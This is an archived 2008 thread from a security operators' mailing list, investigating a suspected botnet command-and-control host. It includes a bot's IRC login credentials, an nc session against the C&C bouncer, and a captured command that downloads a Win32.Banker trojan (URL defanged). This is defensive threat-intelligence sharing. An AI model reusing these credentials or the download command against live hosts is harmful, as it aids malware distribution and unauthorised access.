[nsp-sec] 66.139.78.164 = C&C? -> Bonus Info
White, Gerard
Gerard.White at aliant.ca
Mon Apr 14 11:37:15 EDT 2008
Bonus info:
JOIN ##ghetto## 3atsh1t
WGET hxxp://gh0st.us/228_22.exe (shoving it into the logged-in user's
temp directory)
(Win32.Banker extremely well obfuscated)
VT is 5/32:
http://www.virustotal.com/analisis/26fdb0143fe27e421a21f7d915a96ed6
Anubis sez:
http://analysis.seclab.tuwien.ac.at/result.php?taskid=3d82292f7093eda4c5
5c023aac02054c
GW
855 - Aliant
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> Jose Nazario
> Sent: Monday, April 14, 2008 12:31 PM
> To: Chris Calvert
> Cc: nsp-security NSP
> Subject: Re: [nsp-sec] 66.139.78.164 = C&C?
>
> ----------- nsp-security Confidential --------
>
> On Mon, 14 Apr 2008, Chris Calvert wrote:
>
> > Can anyone confirm seeing botnet C&C traffic for this host?
>
> i have several samples that *attempt* to contact it on TCP port 9798,
but
> no indications they are able to. the DNS name they're using is
>
> gizmo.godaddyy.net
>
> which (at least sometimes) answers with that IP:
>
> <gethostbyname requested_host="gizmo.godaddyy.net"
> resulting_addr="82.146.52.179">
> <more_resulting_addr>
> <resulting_addr>143.248.133.157</resulting_addr>
> <resulting_addr>66.139.78.164</resulting_addr>
> <resulting_addr>70.61.92.197</resulting_addr>
> <resulting_addr>72.20.45.2</resulting_addr>
> <resulting_addr>72.20.45.3</resulting_addr>
> <resulting_addr>72.20.45.4</resulting_addr>
> <resulting_addr>72.20.45.5</resulting_addr>
> </more_resulting_addr></gethostbyname>
>
> here's how it's trying to connect;
>
> <irc_data username="XP-SP2" hostname="x" servername="x"
> realname="HOSTNAME" password="su1c1d3" nick="\00\USA\x70chlwnk7"
> non_rfc_conform="1"/>
>
>
>
> testing manually i see it's a bouncer:
>
> $ nc 66.139.78.164 9798
> <<< :psyBNC-2.3.2-4
> <<< :psyBNC-2.3.2-4
> >>> PASS su1c1d3
> >>> NICK \00\USA\x70 chlwnk7
> >>> USER XP-SP2 x x :MYHOST
> <<< ERROR :Closing Link: \00\USA\x70[HOSTNAME] ((-psyBNC) Wrong
Password.
> Disconnecting.)
>
>
> looks live.
>
> -------------------------------------------------------------
> jose nazario, ph.d. <jose at arbor.net>
> security researcher, office of the CTO, arbor networks
> v: (734) 821 1427 http://asert.arbornetworks.com/
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
> community. Confidentiality is essential for effective Internet
security counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list